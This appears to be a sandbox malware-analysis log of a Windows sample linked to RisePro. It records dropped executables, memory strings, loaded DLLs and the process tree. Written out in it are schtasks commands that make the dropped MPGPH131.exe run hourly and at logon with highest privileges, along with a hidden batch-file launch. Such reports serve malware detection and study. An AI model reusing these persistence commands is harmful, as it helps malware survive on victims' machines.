            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
            Source: MlpxPf.exe, 00000002.00000003.1465075782.0000000001392000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000002.00000002.1570645851.000000000138A000.00000004.00000020.00020000.00000000.sdmp, MlpxPf.exe, 00000012.00000002.1802677497.00000000012AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3926322511.0000000000F1D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3926018738.000000000167A000.00000004.00000020.00020000.00000000.sdmp, RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORT
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3925994112.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTu
            Source: RageMP131.exe, 00000011.00000002.3926399137.000000000169E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/RiseProSUPPORTuH
            Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/
            Source: SciTE.exe.2.drString found in binary or memory: https://www.smartsharesystems.com/Morten
            Source: SciTE.exe.2.drBinary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \memstr_8c964baa-a

            System Summary

            barindex
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: .idata
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name:
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: section name: %~u
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: .idata
            Source: RageMP131.exe.0.drStatic PE information: section name:
            Source: RageMP131.exe.0.drStatic PE information: section name: %~u
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: .idata
            Source: MPGPH131.exe.0.drStatic PE information: section name:
            Source: MPGPH131.exe.0.drStatic PE information: section name: %~u
            Source: MyProg.exe.2.drStatic PE information: section name: Y|uR
            Source: MlpxPf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0034A8000_2_0034A800
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002720400_2_00272040
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0028A1000_2_0028A100
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0035991F0_2_0035991F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002F19400_2_002F1940
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002842A00_2_002842A0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002722C00_2_002722C0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0027AB500_2_0027AB50
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002FBBB00_2_002FBBB0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002F4C200_2_002F4C20
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_002E06F00_2_002E06F0
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_00353ED80_2_00353ED8
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_0027A7200_2_0027A720
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeCode function: 0_2_003507500_2_00350750
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_003560762_2_00356076
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_00356D002_2_00356D00
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0090A8008_2_0090A800
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008320408_2_00832040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0084A1008_2_0084A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0091991F8_2_0091991F
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008B19408_2_008B1940
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008442A08_2_008442A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008322C08_2_008322C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008BBBB08_2_008BBBB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0083AB508_2_0083AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008B4C208_2_008B4C20
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_00913ED88_2_00913ED8
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_008A06F08_2_008A06F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_0083A7208_2_0083A720
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 8_2_009107508_2_00910750
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0090A80011_2_0090A800
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0083204011_2_00832040
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0084A10011_2_0084A100
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0091991F11_2_0091991F
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_008B194011_2_008B1940
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_008442A011_2_008442A0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_008322C011_2_008322C0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_008BBBB011_2_008BBBB0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0083AB5011_2_0083AB50
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_008B4C2011_2_008B4C20
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_00913ED811_2_00913ED8
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_008A06F011_2_008A06F0
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0083A72011_2_0083A720
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: 11_2_0091075011_2_00910750
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00A0A80017_2_00A0A800
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_0093204017_2_00932040
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_0094A10017_2_0094A100
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00A1991F17_2_00A1991F
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_009B194017_2_009B1940
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_009442A017_2_009442A0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_009322C017_2_009322C0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_009BBBB017_2_009BBBB0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_0093AB5017_2_0093AB50
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_009B4C2017_2_009B4C20
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_009A06F017_2_009A06F0
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00A13ED817_2_00A13ED8
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_0093A72017_2_0093A720
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeCode function: 17_2_00A1075017_2_00A10750
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_0059607618_2_00596076
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_00596D0018_2_00596D00
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MlpxPf.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeCode function: String function: 0090D940 appears 46 times
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572
            Source: MyProg.exe.2.drStatic PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3929882601.0000000004BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3913542109.00000000003A7000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1500661513.00000000050A5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1501430554.00000000050A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
            Source: Lisect_AVT_24003_G1A_37.exeBinary or memory string: OriginalFilenameAy3Info.exe0 vs Lisect_AVT_24003_G1A_37.exe
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: MlpxPf.exe.0.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MlpxPf.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            Source: MlpxPf.exe.0.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
            Source: Lisect_AVT_24003_G1A_37.exeStatic PE information: Section: ZLIB complexity 0.9992931872814685
            Source: RageMP131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9992931872814685
            Source: MPGPH131.exe.0.drStatic PE information: Section: ZLIB complexity 0.9992931872814685
            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@26/29@1/2
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 2_2_0035119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,2_2_0035119F
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeCode function: 18_2_0059119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,18_2_0059119F
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile created: C:\Users\user\AppData\Local\RageMP131Jump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3800:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7852:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5072:120:WilError_03
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1840
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile created: C:\Users\user\AppData\Local\Temp\MlpxPf.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Lisect_AVT_24003_G1A_37.exe, 00000000.00000002.3909505303.0000000000271000.00000040.00000001.01000000.00000003.sdmp, Lisect_AVT_24003_G1A_37.exe, 00000000.00000003.1453867562.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000008.00000002.3916521795.0000000000831000.00000040.00000001.01000000.00000009.sdmp, MPGPH131.exe, 00000008.00000003.1524535143.0000000004B30000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000003.1525002999.0000000005240000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 0000000B.00000002.3909502764.0000000000831000.00000040.00000001.01000000.00000009.sdmp, RageMP131.exe, 00000011.00000002.3909493292.0000000000931000.00000040.00000001.01000000.0000000B.sdmp, RageMP131.exe, 00000011.00000003.1626636551.0000000005240000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Lisect_AVT_24003_G1A_37.exeReversingLabs: Detection: 94%
            Source: Lisect_AVT_24003_G1A_37.exeVirustotal: Detection: 84%
            Source: Lisect_AVT_24003_G1A_37.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: MPGPH131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: RageMP131.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeFile read: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe "C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exe"
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exe
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: unknownProcess created: C:\ProgramData\MPGPH131\MPGPH131.exe C:\ProgramData\MPGPH131\MPGPH131.exe
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1840 -s 1572
            Source: unknownProcess created: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe "C:\Users\user\AppData\Local\RageMP131\RageMP131.exe"
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exe
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exeJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHESTJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /RU "user" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHESTJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeProcess created: C:\Users\user\AppData\Local\Temp\MlpxPf.exe C:\Users\user\AppData\Local\Temp\MlpxPf.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\43f50b5b.bat" "Jump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_37.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ntvdm64.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\ProgramData\MPGPH131\MPGPH131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exeSection loaded: devobj.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MlpxPf.exeSection loaded: winnsi.dllJump to behavior
